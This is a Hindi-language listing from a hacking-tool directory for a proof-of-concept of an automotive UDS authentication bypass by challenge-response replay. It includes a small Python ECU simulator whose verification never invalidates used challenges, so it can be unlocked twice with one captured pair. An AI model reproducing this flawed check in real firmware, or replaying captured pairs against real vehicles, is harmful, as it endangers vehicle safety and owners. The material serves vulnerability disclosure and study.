Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो ऑटोमोटिव ECU पर चैलेंज-रिस्पॉन्स रीप्ले के माध्यम से UDS प्रमाणीकरण बायपास को प्रदर्शित करता है, Python CAN-UDS सिम्युलेटर के साथ। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
प्रमाणीकरण और प्राधिकरणएम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षा
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो ऑटोमोटिव ECU पर चैलेंज-रिस्पॉन्स रीप्ले के माध्यम से UDS प्रमाणीकरण बायपास को प्रदर्शित करता है, Python CAN-UDS सिम्युलेटर के साथ।

रिपॉजिटरी देखें
114 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-23004 – रीप्ले अटैक के माध्यम से ऑटोमोटिव UDS प्रमाणीकरण बायपास

प्रोग्राम कोड (Python CAN‑UDS सिम)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – रीप्ले के माध्यम से ऑटोमोटिव UDS प्रमाणीकरण बायपास

Severity: High

अवलोकन

एक ऑटोमोटिव ECU यूनिफाइड डायग्नोस्टिक सर्विसेज़ (UDS) सुरक्षा एक्सेस (सर्विस 0x27) लागू करता है, लेकिन चैलेंज के एक-बार उपयोग को लागू नहीं करता। एक हमलावर एक वैध चैलेंज-प्रतिक्रिया जोड़ी को कैप्चर कर सकता है और प्रमाणीकरण को बायपास करने के लिए उसे रीप्ले कर सकता है।

भेद्यता विवरण

  • प्रकार: रीप्ले अटैक
  • प्रभाव: अनधिकृत ECU प्रोग्रामिंग, सुरक्षा ओवरराइड।
  • मूल कारण: ECU ऐसी किसी भी प्रतिक्रिया को स्वीकार करता है जो वर्तमान चैलेंज से मेल खाती है, लेकिन उसी चैलेंज को अमान्य किए बिना पुनः उपयोग किया जा सकता है।

एक्सप्लॉइट प्रदर्शन

सिमुलेशन चलाएँ:

root@kitploit:~
python uds_sim.py

ECU एक ही प्रमाणीकरण जोड़ी के साथ दो बार अनलॉक होता है।

टूल डाउनलोड करें